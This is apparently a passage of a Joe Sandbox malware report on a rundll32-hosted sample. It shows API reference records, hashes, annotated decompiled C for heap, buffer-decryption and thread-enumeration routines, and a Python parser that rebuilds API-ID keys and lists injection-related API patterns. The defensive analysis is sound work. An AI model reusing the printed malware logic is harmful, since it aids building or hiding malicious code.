                            • WaitForSingleObject.KERNEL32(00000000,761F81D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04A13811
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: ObjectSingleWait
                            • String ID:
                            • API String ID: 24740636-0
                            • Opcode ID: 44bab7b901eb4b28bf265738897d269d568fa84cf7edd1958cba7ac13ed75217
                            • Instruction ID: c2b90c681c39d135327a86dad070bca8a706f5caa95cca52d92b52cb231015c6
                            • Opcode Fuzzy Hash: 44bab7b901eb4b28bf265738897d269d568fa84cf7edd1958cba7ac13ed75217
                            • Instruction Fuzzy Hash: F9216AFA7012459BFF11CF59D880BAE77B9BB91364F10403AEA159B260DB74F842C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 34%
                            			E04A11B6F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                            				intOrPtr _v12;
                            				void* _v18;
                            				char _v20;
                            				intOrPtr _t15;
                            				void* _t17;
                            				intOrPtr _t19;
                            				void* _t23;
                            
                            				_v20 = 0;
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosw");
                            				_t15 =  *0x4a1a348; // 0xb1d5a8
                            				_t4 = _t15 + 0x4a1b3a0; // 0x5538948
                            				_t20 = _t4;
                            				_t6 = _t15 + 0x4a1b124; // 0x650047
                            				_t17 = E04A146CB(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                            				if(_t17 < 0) {
                            					_t23 = _t17;
                            				} else {
                            					_t23 = 8;
                            					if(_v20 != _t23) {
                            						_t23 = 1;
                            					} else {
                            						_t19 = E04A159AE(_t20, _v12);
                            						if(_t19 != 0) {
                            							 *_a16 = _t19;
                            							_t23 = 0;
                            						}
                            						__imp__#6(_v12);
                            					}
                            				}
                            				return _t23;
                            			}

                            APIs
                              • Part of subcall function 04A146CB: SysFreeString.OLEAUT32(?), ref: 04A147AA
                              • Part of subcall function 04A159AE: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04A15EFA,004F0053,00000000,?), ref: 04A159B7
                              • Part of subcall function 04A159AE: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04A15EFA,004F0053,00000000,?), ref: 04A159E1
                              • Part of subcall function 04A159AE: memset.NTDLL ref: 04A159F5
                            • SysFreeString.OLEAUT32(00000000), ref: 04A11BD2
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: FreeString$lstrlenmemcpymemset
                            • String ID:
                            • API String ID: 397948122-0
                            • Opcode ID: 75c63f139321dbbb74f4e560ecec7a4b9619a686c924215d8a8d6253e363dc1f
                            • Instruction ID: 3f9271e2f66c3e3e4833fa53be45c31bd2197a31fe3ca7e897526964abea3fe0
                            • Opcode Fuzzy Hash: 75c63f139321dbbb74f4e560ecec7a4b9619a686c924215d8a8d6253e363dc1f
                            • Instruction Fuzzy Hash: AF015A32504119BFEF119FA8CD01EAABBB9FB18754B044465EA01E7070E370E912D7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 89%
                            			E04A12E4E(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
                            				char _v8;
                            				void* _t14;
                            				intOrPtr _t17;
                            				void* _t20;
                            				void* _t26;
                            
                            				_push(__ecx);
                            				if(_a4 == 0 || __eax == 0) {
                            					_t26 = 0x57;
                            				} else {
                            					_t14 = E04A11C03(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
                            					_t26 = _t14;
                            					if(_t26 == 0) {
                            						_t17 =  *0x4a1a348; // 0xb1d5a8
                            						_t9 = _t17 + 0x4a1ba40; // 0x444f4340
                            						_t20 = E04A13B58( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
                            						_t26 = _t20;
                            						RtlFreeHeap( *0x4a1a2d8, 0, _a4); // executed
                            					}
                            				}
                            				return _t26;
                            			}

                            APIs
                              • Part of subcall function 04A11C03: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 04A11C1B
                              • Part of subcall function 04A13B58: lstrlen.KERNEL32(7620F710,?,00000000,?,7620F710), ref: 04A13B8C
                              • Part of subcall function 04A13B58: StrStrA.SHLWAPI(00000000,?), ref: 04A13B99
                              • Part of subcall function 04A13B58: RtlAllocateHeap.NTDLL(00000000,?), ref: 04A13BB8
                            • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,04A1553D), ref: 04A12EA4
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Heap$Allocate$Freelstrlen
                            • String ID:
                            • API String ID: 2220322926-0
                            • Opcode ID: 5a8c82df0f270dc90f402289f6a14c7ccd6800db980990c6da69eca6688e5596
                            • Instruction ID: 22bf724b5ec641cde4973d1dcf37e2d152c5a03a39a1073851071ecc5f7ad0ed
                            • Opcode Fuzzy Hash: 5a8c82df0f270dc90f402289f6a14c7ccd6800db980990c6da69eca6688e5596
                            • Instruction Fuzzy Hash: CB013C7A200608FFEB22CF44DC40FAA7BB9EB54750F144069FA49961B0E771FA55EB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F671B4: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,04F8A170,00000000,04F75D81,?,04F6F2F7,?), ref: 04F671D3
                              • Part of subcall function 04F671B4: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,04F8A170,00000000,04F75D81,?,04F6F2F7,?), ref: 04F671DE
                              • Part of subcall function 04F671B4: _wcsupr.NTDLL ref: 04F671EB
                              • Part of subcall function 04F671B4: lstrlenW.KERNEL32(00000000), ref: 04F671F3
                            • ResumeThread.KERNEL32(00000004,?,04F6F2F7,?), ref: 04F75D8F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                            • String ID:
                            • API String ID: 3646851950-0
                            • Opcode ID: 25dc9e348d90b7e3ed57a1879576f2dbb6c3bd770dc095fe2f145810314299e4
                            • Instruction ID: ce4d5e08906f0623d88ccac94387cef3e2c9ae20076f37884ffbd07cd9861b5f
                            • Opcode Fuzzy Hash: 25dc9e348d90b7e3ed57a1879576f2dbb6c3bd770dc095fe2f145810314299e4
                            • Instruction Fuzzy Hash: 64D05E39608300BAEB212B20CD09F167DA2DF41B48F00E45AE9C650460C37AAC529A44
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ___delayLoadHelper2@8.DELAYIMP ref: 04F83090
                              • Part of subcall function 04F831E3: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,000260DC,04F60000), ref: 04F8325C
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionHelper2@8LoadRaise___delay
                            • String ID:
                            • API String ID: 123106877-0
                            • Opcode ID: 0aba6e2e3743aae45e52826188669d891af7215a1c7f43d54651a2e7eedbae7b
                            • Instruction ID: 1640b2e8efb03a39456e21b22832f54fb0ebd076eb9955aaedc8046f5c4ac125
                            • Opcode Fuzzy Hash: 0aba6e2e3743aae45e52826188669d891af7215a1c7f43d54651a2e7eedbae7b
                            • Instruction Fuzzy Hash: 81A001967AD602FE35087251AD06D3B271CC5C4E693208D2EE812CC0A0A8837A8B2476
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ___delayLoadHelper2@8.DELAYIMP ref: 04F83090
                              • Part of subcall function 04F831E3: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,000260DC,04F60000), ref: 04F8325C
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionHelper2@8LoadRaise___delay
                            • String ID:
                            • API String ID: 123106877-0
                            • Opcode ID: 785477f5b6f6a36c18afe1c5e3829223b091325bccdce4a08a49d5d2593122f5
                            • Instruction ID: 221b51dcd1252ac0465940812b1a43a8a7316cecbbead3116ded4eb2273bd85f
                            • Opcode Fuzzy Hash: 785477f5b6f6a36c18afe1c5e3829223b091325bccdce4a08a49d5d2593122f5
                            • Instruction Fuzzy Hash: 8BA00296799501BD351471515D06D37171CC5D0D15320491DF811DC050644379471475
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlFreeHeap.NTDLL(00000000,?,04F73953,?,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F7E80F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: da39ee8d102e36fa603e341e46de3c657e3200027a3284d2431735f0f7359047
                            • Instruction ID: 3432bfbf0e6e6637ec7ef7b587f9f093ed18ed16870789fb2f8e6e5dc905b131
                            • Opcode Fuzzy Hash: da39ee8d102e36fa603e341e46de3c657e3200027a3284d2431735f0f7359047
                            • Instruction Fuzzy Hash: 5AB01231400104BBCA014F00FD04F157B21EB50700F004419B2089806082390C68FB04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: a6aaedc58c82283d80d8e5e2022a08d836a69df3c254ffa86deff2c5b565f6b7
                            • Instruction ID: 4f6369d3cd00aad983abd2882896da217c85b647dedbdc3cf24191efe80788a1
                            • Opcode Fuzzy Hash: a6aaedc58c82283d80d8e5e2022a08d836a69df3c254ffa86deff2c5b565f6b7
                            • Instruction Fuzzy Hash: 2DB01275500104BBCA014F00FE04F157B21E750700F004019B3085C06082390C24FB04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E04A16C2C(void* _a4) {
                            				char _t2;
                            
                            				// Thin wrapper around RtlFreeHeap: the heap handle is read from the
                            				// global at 0x4a1a2d8 (the same handle E04A16D63 allocates from), flags 0.
                            				_t2 = RtlFreeHeap( *0x4a1a2d8, 0, _a4); // executed
                            				return _t2;
                            			}

                            APIs
                            • RtlFreeHeap.NTDLL(00000000,00000000,04A15E1D,00000000,?,?,00000000), ref: 04A16C38
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: 1f3699f657997dc6288c6de8df7b5e19bae04274f4d8ce940721ba61a201f624
                            • Instruction ID: e11fa8c44790d55c46ede19bae76aec72266e8527d0ba958e8fec8eae9d5a15f
                            • Opcode Fuzzy Hash: 1f3699f657997dc6288c6de8df7b5e19bae04274f4d8ce940721ba61a201f624
                            • Instruction Fuzzy Hash: DDB012B1200300ABDB124B00DE04F067A21E770B00F014020B30804070C3764C22FB15
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E04A16D63(long _a4) {
                            				void* _t2;
                            
                            				// Allocation counterpart of E04A16C2C: RtlAllocateHeap on the heap handle
                            				// cached at 0x4a1a2d8, flags 0, _a4 bytes. Returns NULL on failure.
                            				_t2 = RtlAllocateHeap( *0x4a1a2d8, 0, _a4); // executed
                            				return _t2;
                            			}

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 44689ce4a3495e5ab2e2431eb7a941c37da4c720de2f4f3a004100265a3f7a06
                            • Instruction ID: 9c6830b3677ea42ab949f4098f4fb638b81b88eaebae5c002a87eaa53682d6c1
                            • Opcode Fuzzy Hash: 44689ce4a3495e5ab2e2431eb7a941c37da4c720de2f4f3a004100265a3f7a06
                            • Instruction Fuzzy Hash: 0CB01275100300ABDA024B00DD08F067B21F770700F004010B20944070C2770C62FB05
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E04A113C7(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
                            				void* _v8;
                            				int _v12;
                            				char _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				char _v32;
                            				char _v144;
                            				int _v148;
                            				intOrPtr _v152;
                            				intOrPtr _v156;
                            				intOrPtr _v160;
                            				char _v164;
                            				void* _t37;
                            				void* _t42;
                            				void* _t51;
                            				int _t53;
                            				void* _t60;
                            				void* _t63;
                            				void* _t64;
                            
                            				// _a4: input buffer, __ecx: its length in bytes, __eax: header dword.
                            				// _t53 is the return value; it stays 0 on every early-exit path, and
                            				// _a8 receives the output buffer only after the comparison below succeeds.
                            				_t53 = 0;
                            				_t60 = __ecx;
                            				_v16 = 0;
                            				_v12 = 0;
                            				_v8 = 0;
                            				// Entry checks: the input must be longer than 0x80 bytes and the header
                            				// dword must be 0x400. The last 0x80 bytes of the input are then passed
                            				// to E04A16FD0 with the header; a non-zero result aborts before any data
                            				// is copied or processed, and so does an output size (_v148) larger
                            				// than the input minus its 0x80-byte trailer.
                            				if(__ecx <= 0x80 ||  *__eax != 0x400) {
                            					L21:
                            					return _t53;
                            				} else {
                            					_t58 =  &_v164;
                            					_t37 = E04A16FD0(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
                            					if(_t37 != 0) {
                            						goto L21;
                            					}
                            					_t61 = _t60 - 0x80;
                            					if(_v148 > _t60 - 0x80) {
                            						goto L21;
                            					}
                            					// Scan 16 bytes of the structure E04A16FD0 filled in (starting 4 bytes
                            					// into _v144). All zero: plain path, allocate _v148 bytes and memcpy the
                            					// input. Otherwise: E04A15FBB processes the input with its length
                            					// rounded down to a multiple of 16 (_t61 & 0xfffffff0).
                            					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
                            						_t37 = _t37 + 1;
                            						if(_t37 < 0x10) {
                            							continue;
                            						}
                            						_t53 = _v148;
                            						_t51 = E04A16D63(_t53);
                            						_v8 = _t51;
                            						_t73 = _t51;
                            						if(_t51 != 0) {
                            							_t53 = 0;
                            							L18:
                            							if(_t53 != 0) {
                            								goto L21;
                            							}
                            							L19:
                            							if(_v8 != 0) {
                            								E04A16C2C(_v8);
                            							}
                            							goto L21;
                            						}
                            						memcpy(_t51, _a4, _t53);
                            						L8:
                            						_t63 = _v8;
                            						// Four-dword (16-byte) comparison of the value E04A16EE7 computes over
                            						// the output (_v32.._v20) against the value E04A16FD0 recorded in
                            						// _v164.._v152; on mismatch the output buffer is released (L19) and
                            						// the caller gets 0 instead of a pointer.
                            						E04A16EE7(_t58, _t73, _t63, _t53,  &_v32);
                            						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
                            							L15:
                            							_t53 = 0;
                            							goto L19;
                            						} else {
                            							 *_a8 = _t63;
                            							goto L18;
                            						}
                            					}
                            					_t58 =  &_v144;
                            					_t42 = E04A15FBB(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
                            					__eflags = _t42;
                            					if(_t42 != 0) {
                            						_t53 = _v12;
                            						goto L18;
                            					}
                            					// E04A15FBB must have produced at least _v148 bytes (_v12 >= _v148)
                            					// before the output is compared at L8; otherwise fail at L15.
                            					_t53 = _v148;
                            					__eflags = _v12 - _t53;
                            					if(__eflags >= 0) {
                            						goto L8;
                            					}
                            					goto L15;
                            				}
                            			}

                            APIs
                            • memcpy.NTDLL(00000000,?,?,?,?,?,00000001,?,?,?), ref: 04A1144E
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: memcpy
                            • String ID:
                            • API String ID: 3510742995-0
                            • Opcode ID: abb85139146cbcf153fec2de335a04d8f6deebc596956e986da98068f9f02800
                            • Instruction ID: 4bdc03a42786dbb593543d7c8a855b3f169fd75377d3797e68983d4c86e51a67
                            • Opcode Fuzzy Hash: abb85139146cbcf153fec2de335a04d8f6deebc596956e986da98068f9f02800
                            • Instruction Fuzzy Hash: CE3110B1A00119EFDF21DF94C9C0FEEB7B9BB08758F1044A9E609A71A1D634AE45CB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F81ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F02
                              • Part of subcall function 04F81ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 04F81F16
                              • Part of subcall function 04F81ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F30
                              • Part of subcall function 04F81ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,04F62C89,?,?,?), ref: 04F81F5A
                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,7620F710,00000000,00000000,?,?,?,04F6E30A,?), ref: 04F7FDB6
                              • Part of subcall function 04F7AF83: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,?,04F663CD,00000000,00000001,-00000007,?,00000000), ref: 04F7AFA6
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HeapQueryValue$AllocateCloseFreememcpy
                            • String ID:
                            • API String ID: 1301464996-0
                            • Opcode ID: ea0cc4e8bd53f0d71f7091ba8e1d16edff5bfcadbdfffa01e0b498c1f5facb34
                            • Instruction ID: 355013e0f24e7a084ae124f8a8aa647f8cfb8853bfac4cb8873801e69e2ce7de
                            • Opcode Fuzzy Hash: ea0cc4e8bd53f0d71f7091ba8e1d16edff5bfcadbdfffa01e0b498c1f5facb34
                            • Instruction Fuzzy Hash: 17119172A10205AFDB549F48DC90EBE77A9EF48314F10406EE5019F241EBB9BD029B64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • memcpy.NTDLL(?,04F8A324,00000018,04F76FFC,06318E36,?,04F76FFC,06318E36,?,04F76FFC,06318E36,?,?,?,?,04F76FFC), ref: 04F72CB2
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy
                            • String ID:
                            • API String ID: 3510742995-0
                            • Opcode ID: 87bfa070c989df27dd4f5d68c14178a437e901f04c82762713783882105a641d
                            • Instruction ID: 467606fd4d6a0af1ef14076dab4e69ce05c70986e14f898e11ded378054f4323
                            • Opcode Fuzzy Hash: 87bfa070c989df27dd4f5d68c14178a437e901f04c82762713783882105a641d
                            • Instruction Fuzzy Hash: CD115B76E0060CABDB15EF55FC41CB63BA9EB95321705816FF5188F251D73AA902CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F81ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F02
                              • Part of subcall function 04F81ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 04F81F16
                              • Part of subcall function 04F81ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F30
                              • Part of subcall function 04F81ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,04F62C89,?,?,?), ref: 04F81F5A
                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 04F67100
                              • Part of subcall function 04F64963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,04F670EB,00000000,?,00000000,?,?,?,?,?,?), ref: 04F64975
                              • Part of subcall function 04F64963: StrChrA.SHLWAPI(?,00000020,?,00000000,04F670EB,00000000,?,00000000,?,?,?,?,?,?), ref: 04F64984
                              • Part of subcall function 04F6EE04: CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 04F6EE2A
                              • Part of subcall function 04F6EE04: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 04F6EE36
                              • Part of subcall function 04F6EE04: GetModuleHandleA.KERNEL32(?,0631978E,00000000,?,00000000), ref: 04F6EE56
                              • Part of subcall function 04F6EE04: GetProcAddress.KERNEL32(00000000), ref: 04F6EE5D
                              • Part of subcall function 04F6EE04: Thread32First.KERNEL32(?,0000001C), ref: 04F6EE6D
                              • Part of subcall function 04F6EE04: CloseHandle.KERNEL32(?), ref: 04F6EEB5
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                            • String ID:
                            • API String ID: 2627809124-0
                            • Opcode ID: 0216c5c9e2c7f1b23108812f61cdf60909829f6fbb6880e689dd9ebec413809e
                            • Instruction ID: 7d965489ad8e45407f6ea5d2ba96c547b360dbe5f3b29ea9802ebf805ebf1e4a
                            • Opcode Fuzzy Hash: 0216c5c9e2c7f1b23108812f61cdf60909829f6fbb6880e689dd9ebec413809e
                            • Instruction Fuzzy Hash: 9C016271A10519BFEB11EBA9ED84CAFB7ECEF55258700005AF502A7100DA79BE06DB70
                            Uniqueness

                            Uniqueness Score: -1.00%
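The "API ID" under Similarity is the key that summarises which APIs a function (and the functions it calls) references, for example "FileName$FindImagePathProcessResumeThread_wcsuprlstrlen" for the ResumeThread record and "CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32" for the record directly above. The Python below is an added example, not part of this report and not Joe Sandbox's own tooling: it parses the "APIs" lines in the format shown on this page and rebuilds that key. The rebuilding rule (split each name before every capital letter, drop tokens of three characters or fewer, count tokens over all listed references, group by count in descending order, sort each group, join the groups with "$") is inferred from the records on this page and is an assumption, not documented Joe Sandbox behaviour. The injection-related API combinations at the end are constructed heuristics, and the two sample listings are copied from the records named above.

```python
"""Parse the per-function "APIs" lines of a Joe Sandbox report and rebuild
the "API ID" shown under Similarity.

Added example; not part of this report or of Joe Sandbox's own tooling.
The line format is taken from the report. The API ID rule is inferred from
the report's own records and is an assumption: split each API name before
every capital letter, drop tokens of three characters or fewer (Get, Reg,
Rtl, Str, Ex, A, W ...), count the remaining tokens over all listed calls
(subcall lines included, once per reference), group by count in descending
order, sort each group, and join the groups with '$'.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# One reference line. The "Part of subcall function" prefix, the argument
# list and the comma before "ref:" are all optional in the report.
API_LINE = re.compile(
    r"^\s*[•*-]?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][\w@]*)\.(?P<dll>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiRef:
    api: str
    dll: str
    args: tuple                 # raw argument strings; '?' means unknown to the sandbox
    ref: int                    # address of the call site
    subcall_of: Optional[int]   # callee whose body contains the call, if reported


def parse_api_lines(text: str) -> List[ApiRef]:
    """Parse every API reference line; lines that do not match are skipped."""
    refs = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = tuple(a for a in (m.group("args") or "").split(",") if a)
        sub = m.group("sub")
        refs.append(ApiRef(m.group("api"), m.group("dll"), args,
                           int(m.group("ref"), 16),
                           int(sub, 16) if sub else None))
    return refs


def api_tokens(name: str) -> List[str]:
    """'GetProcessImageFileNameW' -> ['Process', 'Image', 'File', 'Name']."""
    return [t for t in re.split(r"(?=[A-Z])", name) if len(t) > 3]


def api_id(refs: List[ApiRef]) -> str:
    """Rebuild the Similarity 'API ID' key (inferred rule, see module docstring)."""
    counts = Counter(tok for r in refs for tok in api_tokens(r.api))
    by_count: Dict[int, List[str]] = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n]))
                    for n in sorted(by_count, reverse=True))


# Constructed heuristics keyed on API combinations seen in this report; they
# are illustrative, not a detection rule shipped by Joe Sandbox.
PATTERNS: Dict[str, Set[str]] = {
    "thread enumeration via Toolhelp": {"CreateToolhelp32Snapshot", "Thread32First"},
    "runtime import resolution": {"GetModuleHandleA", "GetProcAddress"},
    "target selection by image name": {"GetProcessImageFileNameW", "PathFindFileNameW"},
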